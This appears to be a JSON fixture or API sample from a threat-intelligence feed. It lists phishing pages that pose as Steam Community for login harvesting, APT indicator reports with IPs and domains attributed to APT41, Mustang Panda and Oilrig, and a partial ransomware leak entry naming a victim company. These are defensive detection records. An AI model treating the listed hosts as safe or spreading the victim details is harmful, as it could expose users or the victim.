"2017-10-11T22:14:20+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:6413fb9f0b0a2869a40fe6e970d6fc638cc0cc9fe4c664f5d1c99f56fa3c36b7", + "filetype": "pageHtml", + "filename": "h:6413fb9f0b0a2869a40fe6e970d6fc638cc0cc9fe4c664f5d1c99f56fa3c36b7", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageScreen", + "filename": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "399987ec3383d660e5833b7396a817884fbe2eb8a14eae715bfeb8bcce329978", + "url": "http://accsteamorigin.sells.com.ua/akkauntyi-steam/c1?size=10&sort=name", + "date": { + "blocked": "2017-12-07T07:23:52+03:00", + "added": "2017-10-11T22:14:24+03:00", + "detected": "2017-10-11T22:14:24+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:d2bae3ff95a90fcc43485921a13e156c3f7e3c5d119fb79b786d69a27be47278", + "filetype": "pageHtml", + "filename": "h:d2bae3ff95a90fcc43485921a13e156c3f7e3c5d119fb79b786d69a27be47278", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageScreen", + "filename": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "d3b85abb6f339983ae8378ac1d3d7b2bd28d9e07c6e6de7d42a34f46c99c2ad6", + "url": "http://accsteamorigin.sells.com.ua/empire-total-war/p2", + "date": { + "blocked": "2017-12-07T07:23:51+03:00", + "added": "2017-10-11T22:09:09+03:00", + "detected": "2017-10-11T22:09:09+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:35e7a745885e371b61eb3a8248c467f3dd934fc398d1739f18966b0e4d35af0e", + "filetype": "pageHtml", + "filename": "h:35e7a745885e371b61eb3a8248c467f3dd934fc398d1739f18966b0e4d35af0e", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:543c98d243bbc39461aecc4d5cde25a7cf5b798e6b4d79bcc4ce68316bd9abbb", + "filetype": "pageScreen", + "filename": "s:543c98d243bbc39461aecc4d5cde25a7cf5b798e6b4d79bcc4ce68316bd9abbb", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "d21964c861da14ca52dc598458157e8ef38d2d75110e0244396290e0fd0c8bc3", + "url": "http://accsteamorigin.sells.com.ua/akkauntyi-origin/c2?size=10&=amp", + "date": { + "blocked": "2017-12-07T07:23:51+03:00", + "added": "2017-10-11T22:03:13+03:00", + "detected": "2017-10-11T22:03:13+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:4d0fec164c571176d65b752a5f7412ee11f04400a0e0e34da337e2f080ae8ac9", + "filetype": "pageHtml", + "filename": "h:4d0fec164c571176d65b752a5f7412ee11f04400a0e0e34da337e2f080ae8ac9", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:e1a659acc300693c1eefedd540c76109c2f2b4bdd53999f9cc188463683ba597", + "filetype": "pageScreen", + "filename": "s:e1a659acc300693c1eefedd540c76109c2f2b4bdd53999f9cc188463683ba597", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "71fa641ca0260cf5097cdc94363af3cca077903d73ef51dbf84d2fe966da00e1", + "url": "http://accsteamorigin.sells.com.ua/akkauntyi-origin/c2/2", + "date": { + "blocked": "2017-12-07T07:23:49+03:00", + "added": "2017-10-11T21:46:48+03:00", + "detected": "2017-10-11T21:46:48+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageHtml", + "filename": "h:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:f84da9cc91c3708ce72861e19bbf854af534d2cf77ca0586432c0c123ddb0514", + "filetype": "pageScreen", + "filename": "s:f84da9cc91c3708ce72861e19bbf854af534d2cf77ca0586432c0c123ddb0514", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "52ebffd121be60515ce9403b425c11b7724b86c1259be50196e2b81c8cb70534", + "url": "http://accsteamorigin.sells.com.ua/products?sort=expensive&size=10", + "date": { + "blocked": "2017-12-07T07:23:47+03:00", + "added": "2017-10-11T21:42:11+03:00", + "detected": "2017-10-11T21:42:11+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:f9b7a6cc1617e663eabde3527869f723ca4c496c9a8b8b40c4090d3be6877012", + "filetype": "pageHtml", + "filename": "h:f9b7a6cc1617e663eabde3527869f723ca4c496c9a8b8b40c4090d3be6877012", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageScreen", + "filename": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "546c7738cd52d6882b34f1a93adb1ff9864ef59ca255be91e0afc815bd3927c8", + "url": "http://accsteamorigin.sells.com.ua/products/2?sort=name", + "date": { + "blocked": "2017-12-07T07:23:47+03:00", + "added": "2017-10-11T21:42:10+03:00", + "detected": "2017-10-11T21:42:10+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageHtml", + "filename": "h:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:2a6262c9e361abb7bd31ff64d6070ad423eb62bdd5771dfad8827248ec6fb8c5", + "filetype": "pageScreen", + "filename": "s:2a6262c9e361abb7bd31ff64d6070ad423eb62bdd5771dfad8827248ec6fb8c5", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "6551900a64bcb77261de7b9c885aa26effe30064872c17de2a1fc1d435573ee1", + "url": "http://accsteamorigin.sells.com.ua/products?sort=name&size=30", + "date": { + "blocked": "2017-12-07T07:23:46+03:00", + "added": "2017-10-11T21:30:55+03:00", + "detected": "2017-10-11T21:30:55+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:8e741caac344e2763637e42d22cffb812bd28d42e1d53ab1f714f27504eaa27e", + "filetype": "pageHtml", + "filename": "h:8e741caac344e2763637e42d22cffb812bd28d42e1d53ab1f714f27504eaa27e", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:f9ff8e76dad9ec24da6ad9e133e73c7b111abeeb5e807cb15f8cb4ea2f83c836", + "filetype": "pageScreen", + "filename": "s:f9ff8e76dad9ec24da6ad9e133e73c7b111abeeb5e807cb15f8cb4ea2f83c836", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "ef1a653812575dde248b8de44a80d999e4b498aac53d56ab7af1cf6f1d7edb6b", + "url": "http://accsteamorigin.sells.com.ua/products?sort=name&size=10", + "date": { + "blocked": "2017-12-07T07:23:46+03:00", + "added": "2017-10-11T21:30:53+03:00", + "detected": "2017-10-11T21:30:53+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:76f3775c680f1aae22fe62abdc5c330a1a49ea36ca104a9063a76a0a41ee7063", + "filetype": "pageHtml", + "filename": "h:76f3775c680f1aae22fe62abdc5c330a1a49ea36ca104a9063a76a0a41ee7063", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:5973a2971f6ec1e730d69e7be8b7246b355dcf5dbebfac1b44d4c79fc89f4b9b", + "filetype": "pageScreen", + "filename": "s:5973a2971f6ec1e730d69e7be8b7246b355dcf5dbebfac1b44d4c79fc89f4b9b", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "12c1361579bffe67dd10524c20390a8e749072fbb838c25d9ac918d074a096ca", + "url": "http://accsteamorigin.sells.com.ua/klyuchi-steam/c6?sort=name", + "date": { + "blocked": "2017-12-07T07:23:42+03:00", + "added": "2017-10-11T21:23:28+03:00", + "detected": "2017-10-11T21:23:28+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:6c3cb8483e025939fe5862dc3f757b486172445c5aaeef53822dbc4ad0c4cdf1", + "filetype": "pageHtml", + "filename": "h:6c3cb8483e025939fe5862dc3f757b486172445c5aaeef53822dbc4ad0c4cdf1", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:398180d20fc9854acaad4f78ed9f3e851d0fce936ff41cf6ea461e1711e19998", + "filetype": "pageScreen", + "filename": "s:398180d20fc9854acaad4f78ed9f3e851d0fce936ff41cf6ea461e1711e19998", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "c3078d9cb7c580110c854c8a4c041655d012278626680a02b0bb985ab952ba0f", + "url": "http://accsteamorigin.sells.com.ua/products?size=10&page=1", + "date": { + "blocked": "2017-12-07T07:23:42+03:00", + "added": "2017-10-11T21:23:28+03:00", + "detected": "2017-10-11T21:23:28+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:a28117d088b88babeb5ce148e1f73ce21a93b9d35361b6ac640b6c5633703272", + "filetype": "pageHtml", + "filename": "h:a28117d088b88babeb5ce148e1f73ce21a93b9d35361b6ac640b6c5633703272", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageScreen", + "filename": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "fcd6b9e192152cd4103b465cdfe7a539f5a0c76b5764b458aa68b1c0002b7e45", + "url": "http://accsteamorigin.sells.com.ua/akkauntyi-origin/c2/2?sort=cheap", + "date": { + "blocked": "2017-12-07T07:23:41+03:00", + "added": "2017-10-11T21:11:27+03:00", + "detected": "2017-10-11T21:11:27+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:8e9d461ed5cf4f874cead72e4d7f901afc3d1527dd6b3b00557803e250e69cce", + "filetype": "pageHtml", + "filename": "h:8e9d461ed5cf4f874cead72e4d7f901afc3d1527dd6b3b00557803e250e69cce", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:7e820107f712a853286fbfa04052d9f8649b32da6f6f9b6f8870ddc7173d61d1", + "filetype": "pageScreen", + "filename": "s:7e820107f712a853286fbfa04052d9f8649b32da6f6f9b6f8870ddc7173d61d1", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "38f94514e569b81b0fe264da5d48c93677332a017d217ac35bb59e369c7f34ab", + "url": "http://accsteamorigin.sells.com.ua/akkauntyi-steam/c1?size=10&sort=cheap", + "date": { + "blocked": "2017-12-07T07:23:40+03:00", + "added": "2017-10-11T20:53:30+03:00", + "detected": "2017-10-11T20:53:30+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:e77a6f04ea5e6b2e7aab924a36739cfc01ff514939bd44dc49c08a87a97b8477", + "filetype": "pageHtml", + "filename": "h:e77a6f04ea5e6b2e7aab924a36739cfc01ff514939bd44dc49c08a87a97b8477", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageScreen", + "filename": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "bbee01e256e188625648aa5fe8c9db2d7b7298b6d03b229e24e1018617d45c0e", + "url": "http://accsteamorigin.sells.com.ua/products?sort=cheap&size=30", + "date": { + "blocked": "2017-12-07T07:23:40+03:00", + "added": "2017-10-11T20:36:03+03:00", + "detected": "2017-10-11T20:36:03+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:cfaea13d115982fe593364e5d2a4e47436681010e094eb752a78e92a469ee252", + "filetype": "pageHtml", + "filename": "h:cfaea13d115982fe593364e5d2a4e47436681010e094eb752a78e92a469ee252", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:536691c2f90954d9af264ebb947e5fde4425d91a34157d34518f4f2449e709b1", + "filetype": "pageScreen", + "filename": "s:536691c2f90954d9af264ebb947e5fde4425d91a34157d34518f4f2449e709b1", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + } + ], + "displayOptions": { + "isFavourite": false, + "isHidden": false + } + } + ], + "seqUpdate": 1430425612098642 + }, + "apt/threat":{ + "count": 57, + "items": [ + { + "contacts": [], + "countries": [], + "createdAt": "2024-09-23T23:20:09+03:00", + "cveList": [], + "dateFirstSeen": "2024-09-23", + "dateLastSeen": "2024-09-23", + "datePublished": "2024-09-24", + "description": "\n
\n    This report is published automatically.\n

\n During daily monitoring of malicious infrastructure the Group-IB Threat Intelligence detected the following indicators:\n

\n\n
  • hosts (1)

\n The disclosed indicators with medium/medium-high confidence belong to the\n APT41. The indicators have already been used or will be used in future attacks.\n

\n\n

\n Source description:\n

\n
  • \n Group-IB hunting rules – information received as a result of detecting by hunting rule.\n

Detected network indicators:

\n\n \n \n \n \n \n \n \n \n \n \n \n \n
SourceURLDomainIPRelated malware

Group-IB hunting rules

--

95[.]179[.]134[.]240

-
", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "evaluation": { + "admiraltyCode": "C3", + "credibility": 60, + "reliability": 60, + "severity": "red", + "tlp": "red", + "ttl": null + }, + "expertise": [ + "AutoReport" + ], + "files": [], + "forumsAccounts": [], + "hasIocs": true, + "id": "d1da0a53543a18e5240ece12d031b6ad711a8202", + "indicatorMalwareRelationships": [], + "indicatorRelationships": [], + "indicatorToolRelationships": [], + "indicators": [ + { + "attributes": null, + "dateFirstSeen": "2024-09-23", + "dateLastSeen": "2024-09-23", + "description": null, + "id": "6ecb34d68b26c7bc369dd209f0db9cc3a9c6a8c7", + "langs": [ + "ru" + ], + "malwareIdList": null, + "malwareList": [], + "params": { + "domain": null, + "ipv4": [ + "95.179.134.240" + ], + "ipv6": [], + "ssl": [], + "url": "" + }, + "seqUpdate": 17271228138607, + "sources": [ + "panda_playbook" + ], + "techSeqUpdate": null, + "title": null, + "type": "network" + } + ], + "indicatorsIds": [ + "6ecb34d68b26c7bc369dd209f0db9cc3a9c6a8c7" + ], + "isAutogen": true, + "isPublished": true, + "isTailored": false, + "labels": [], + "langs": [ + "en", + "ru" + ], + "malwareList": [], + "mitreMatrix": [], + "oldId": null, + "regions": [], + "relatedThreatActors": [], + "reportNumber": "CP-2809-2320", + "sectors": [], + "seqUpdate": 17271360303706, + "shortDescription": null, + "shortTitle": null, + "sourceList": [], + "sources": [], + "targetedCompany": [], + "targetedPartnersAndClients": [], + "techSeqUpdate": null, + "threatActor": { + "country": "CN", + "id": "59a1326f2bed234dcb864a69e7ab28b2fa4b14e9", + "isAPT": true, + "name": "APT41" + }, + "title": "APT41 - New indicators have been found", + "toolList": [], + "type": "event", + "unreliableIndicators": [], + "unreliableIndicatorsRelations": [], + "updatedAt": "2024-09-24T03:00:30+03:00" + }, + { + "contacts": [], + "countries": [], + "createdAt": "2024-09-24T03:50:06+03:00", + "cveList": [], + "dateFirstSeen": "2024-09-24", + "dateLastSeen": "2024-09-24", + "datePublished": "2024-09-25", + "description": "\n
\n    This report is published automatically.\n

\n During daily monitoring of malicious infrastructure the Group-IB Threat Intelligence detected the following indicators:\n

\n\n
  • hosts (1)

\n The disclosed indicators with medium/medium-high confidence belong to the\n Mustang Panda. The indicators have already been used or will be used in future attacks.\n

\n\n

\n Source description:\n

\n
  • \n Group-IB hunting rules – information received as a result of detecting by hunting rule.\n

Detected network indicators:

\n\n \n \n \n \n \n \n \n \n \n \n \n \n
SourceURLDomainIPRelated malware

Group-IB hunting rules

--

147[.]78[.]12[.]202

-
", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "evaluation": { + "admiraltyCode": "C3", + "credibility": 60, + "reliability": 60, + "severity": "red", + "tlp": "red", + "ttl": null + }, + "expertise": [ + "AutoReport" + ], + "files": [], + "forumsAccounts": [], + "hasIocs": true, + "id": "d2fbd8a75768de39f022b3173babc0e7ec64a521", + "indicatorMalwareRelationships": [], + "indicatorRelationships": [], + "indicatorToolRelationships": [], + "indicators": [ + { + "attributes": null, + "dateFirstSeen": "2024-09-24", + "dateLastSeen": "2024-09-24", + "description": null, + "id": "375efaa5e042b289579c147dd1c95d9b8ccdbee4", + "langs": [ + "ru" + ], + "malwareIdList": null, + "malwareList": [], + "params": { + "domain": null, + "ipv4": [ + "147.78.12.202" + ], + "ipv6": [], + "ssl": [], + "url": "" + }, + "seqUpdate": 17271390119447, + "sources": [ + "panda_playbook" + ], + "techSeqUpdate": null, + "title": null, + "type": "network" + } + ], + "indicatorsIds": [ + "375efaa5e042b289579c147dd1c95d9b8ccdbee4" + ], + "isAutogen": true, + "isPublished": true, + "isTailored": false, + "labels": [], + "langs": [ + "en", + "ru" + ], + "malwareList": [], + "mitreMatrix": [], + "oldId": null, + "regions": [], + "relatedThreatActors": [], + "reportNumber": "CP-2809-0350", + "sectors": [], + "seqUpdate": 17272224218059, + "shortDescription": null, + "shortTitle": null, + "sourceList": [], + "sources": [], + "targetedCompany": [], + "targetedPartnersAndClients": [], + "techSeqUpdate": null, + "threatActor": { + "country": "CN", + "id": "06aea4ef831ae0fe5c97348e47901fc7293ebd40", + "isAPT": true, + "name": "Mustang Panda" + }, + "title": "Mustang Panda - New indicators have been found", + "toolList": [], + "type": "event", + "unreliableIndicators": [], + "unreliableIndicatorsRelations": [], + "updatedAt": "2024-09-25T03:00:21+03:00" + }, + { + "contacts": [], + "countries": [], + "createdAt": "2024-09-24T08:50:11+03:00", + "cveList": [], + "dateFirstSeen": "2024-09-24", + "dateLastSeen": "2024-09-24", + "datePublished": "2024-09-25", + "description": "\n
\n    This report is published automatically.\n

\n During daily monitoring of malicious infrastructure the Group-IB Threat Intelligence detected the following indicators:\n

\n\n
  • hosts (1)

\n The disclosed indicators with medium/medium-high confidence belong to the\n Oilrig. The indicators have already been used or will be used in future attacks.\n

\n\n

\n Source description:\n

\n
  • \n Group-IB hunting rules – information received as a result of detecting by hunting rule.\n

Detected network indicators:

\n\n \n \n \n \n \n \n \n \n \n \n \n \n
SourceURLDomainIPRelated malware

Group-IB hunting rules

-wehermes[.]com--
", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "evaluation": { + "admiraltyCode": "C3", + "credibility": 60, + "reliability": 60, + "severity": "red", + "tlp": "red", + "ttl": null + }, + "expertise": [ + "AutoReport" + ], + "files": [], + "forumsAccounts": [], + "hasIocs": true, + "id": "4ffc68d1fd5cd6a2084c8284256be7651aafa84b", + "indicatorMalwareRelationships": [], + "indicatorRelationships": [], + "indicatorToolRelationships": [], + "indicators": [ + { + "attributes": null, + "dateFirstSeen": "2024-09-24", + "dateLastSeen": "2024-09-24", + "description": null, + "id": "0a3f9339b944b7976bbbccf6a695592ce97b7523", + "langs": [ + "ru" + ], + "malwareIdList": null, + "malwareList": [], + "params": { + "domain": "wehermes.com", + "ipv4": [], + "ipv6": [], + "ssl": [], + "url": "" + }, + "seqUpdate": 17271570168080, + "sources": [ + "panda_playbook" + ], + "techSeqUpdate": null, + "title": null, + "type": "network" + } + ], + "indicatorsIds": [ + "0a3f9339b944b7976bbbccf6a695592ce97b7523" + ], + "isAutogen": true, + "isPublished": true, + "isTailored": false, + "labels": [], + "langs": [ + "en", + "ru" + ], + "malwareList": [], + "mitreMatrix": [], + "oldId": null, + "regions": [], + "relatedThreatActors": [], + "reportNumber": "CP-2809-0850", + "sectors": [], + "seqUpdate": 17272224279604, + "shortDescription": null, + "shortTitle": null, + "sourceList": [], + "sources": [], + "targetedCompany": [], + "targetedPartnersAndClients": [], + "techSeqUpdate": null, + "threatActor": { + "country": "IR", + "id": "ea7951d222a76335539dfe8774fd24dba6770139", + "isAPT": true, + "name": "Oilrig" + }, + "title": "Oilrig - New indicators have been found", + "toolList": [], + "type": "event", + "unreliableIndicators": [], + "unreliableIndicatorsRelations": [], + "updatedAt": "2024-09-25T03:00:27+03:00" + } + ], + "seqUpdate": 17272224279604 + }, + "hi/threat":{ + "count": 1355, + "items": [ + { + "contacts": [], + "countries": [ + "CA" + ], + "createdAt": "2024-09-23T06:16:41+03:00", + "cveList": [], + "dateFirstSeen": "2024-09-23", + "dateLastSeen": "2024-09-23", + "datePublished": "2024-09-23", + "description": "

2024-09-23 Qilin ransomware attacked Canstar Restorations canstarrestorations[.]com.

Screenshot from Qilin DLS

At present data wasn't posted on a Data Leak Site (DLS). ", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "evaluation": { + "admiraltyCode": "A1", + "credibility": 100, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": null + }, + "expertise": [ + "Leak", + "Ransomware", + "AutoReport" + ], + "files": [ + { + "hash": "9f432b3fd71ed9e40ca5e35cb7630d7dd3499245edcee601915011ad0a356ab7", + "mime": "image/png", + "name": "9f432b3fd71ed9e40ca5e35cb7630d7dd3499245edcee601915011ad0a356ab7", + "size": 2895505 + } + ], + "forumsAccounts": [], + "hasIocs": false, + "id": "d4a164b9caecc0d28041bb042bfad1acfb91f77a", + "indicatorMalwareRelationships": [], + "indicatorRelationships": [], + "indicatorToolRelationships": [], + "indicators": [], + "indicatorsIds": [], + "isAutogen": false, + "isPublished": true, + "isTailored": false, + "labels": [], + "langs": [ + "en", + "ru" + ], + "malwareList": [], + "mitreMatrix": [ + { + "attackPatternId": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "attackTactic": "impact", + "attackType": "enterprise_tactics", + 